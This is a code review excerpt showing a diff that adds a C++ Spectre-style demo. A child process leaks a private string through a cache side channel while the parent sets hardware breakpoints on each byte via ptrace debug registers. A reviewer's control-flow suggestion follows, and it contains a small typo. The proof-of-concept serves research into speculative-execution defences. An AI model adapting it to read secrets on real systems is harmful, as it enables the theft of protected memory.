demos/speculation_over_hw_breakpoint.cc

```diff
@@ -0,0 +1,203 @@
+    asm volatile("afterspeculation:");
+
+    std::pair<bool, char> result =
+        sidechannel.RecomputeScores(public_data[safe_offset]);
+
+    if (result.first) {
+      return result.second;
+    }
+
+    if (run > 100000) {
+      std::cerr << "Does not converge " << result.second << std::endl;
+      exit(EXIT_FAILURE);
+    }
+  }
+}
+
+void ChildProcess() {
+  // Precompute the length of private data, so that we don't have to access it
+  // when it contains the hardware breakpoint.
+  size_t private_data_length = strlen(private_data);
+  // Similarly we have to precompute the length of public data, because on some
+  // systems the __strlen_avx2 executed on public data can touch the breakpoint
+  // in private data.
+  size_t public_data_length = strlen(public_data);
+
+  // Allow the parent to trace child's execution.
+  int res = ptrace(PTRACE_TRACEME, 0, nullptr, nullptr);
+  if (res == -1) {
+    std::cerr << "PTRACE_TRACEME failed." << std::endl;
+    exit(EXIT_FAILURE);
+  }
+
+  std::cout << "Leaking the string: ";
+  std::cout.flush();
+  const size_t private_offset = private_data - public_data;
+  for (size_t i = 0; i < private_data_length; ++i) {
+    // Synchronize with the parent. Let it setup the hardware breakpoint on the
+    // next character.
+    raise(SIGSTOP);
+    MemoryAndSpeculationBarrier();
+    std::cout << LeakByte(public_data, public_data_length, private_offset + i);
+    std::cout.flush();
+  }
+  std::cout << "\nDone!\n";
+}
+
+void ParentProcess(pid_t child) {
+  // Index of the breakpoint in the private data.
+  size_t index = 0;
+  while (true) {
+    int wstatus, res;
+    wait(&wstatus);
+    if (WIFSTOPPED(wstatus) && WSTOPSIG(wstatus) == SIGSTOP) {
+      // The child stopped itself with "raise(SIGSTOP)". We have to put the
+      // breakpoint on the current character of private_data and let it
+      // continue.
+      // Pointing dr0 on the current index in private_data and incrementing
+      // the index.
+      res = ptrace(PTRACE_POKEUSER, child, offsetof(user, u_debugreg[0]),
+                   private_data + index++);
+      if (res == -1) {
+        std::cerr << "PTRACE_POKEUSER on dr0 failed." << std::endl;
+        exit(EXIT_FAILURE);
+      }
+
+      // Setting the 0th, 15th and 16th bit in dr7.
+      // 0th bit means the active breakpoint is in local dr0.
+      // 15th and 16th bits mean the trap activates on each read and write.
+      res = ptrace(PTRACE_POKEUSER, child, offsetof(user, u_debugreg[7]),
+                   0x30001);
+      if (res == -1) {
+        std::cerr << "PTRACE_POKEUSER on dr7 failed." << errno << std::endl;
+        exit(EXIT_FAILURE);
+      }
+
+      // Wake up the child.
+      res = ptrace(PTRACE_CONT, child, nullptr, nullptr);
+      if (res == -1) {
+        std::cerr << "PTRACE_CONT after SIGSTOP failed." << std::endl;
+        exit(EXIT_FAILURE);
+      }
+    } else if (WIFSTOPPED(wstatus) && WSTOPSIG(wstatus) == SIGTRAP) {
```

Comment:
I think we can simplify the control flow here a bit:

```c++
while(true) {
  // ...
  
  if (!WIFSTOPPED(wstatus)) {
    break;  // unexpected wait event
  }
  
  if (WSTOPSIG(wstatus) == SIGSTOP) {
    // set debug registers
  } else if (WSTOPSTIG(wstatus) == SIGTRAP) {
    // move instruction pointer
  } else {
    break;  // unexpected signal
  }
  
  // continue debuggee with PTRACE_CONT
  // ...
}
```

Reply:
Done.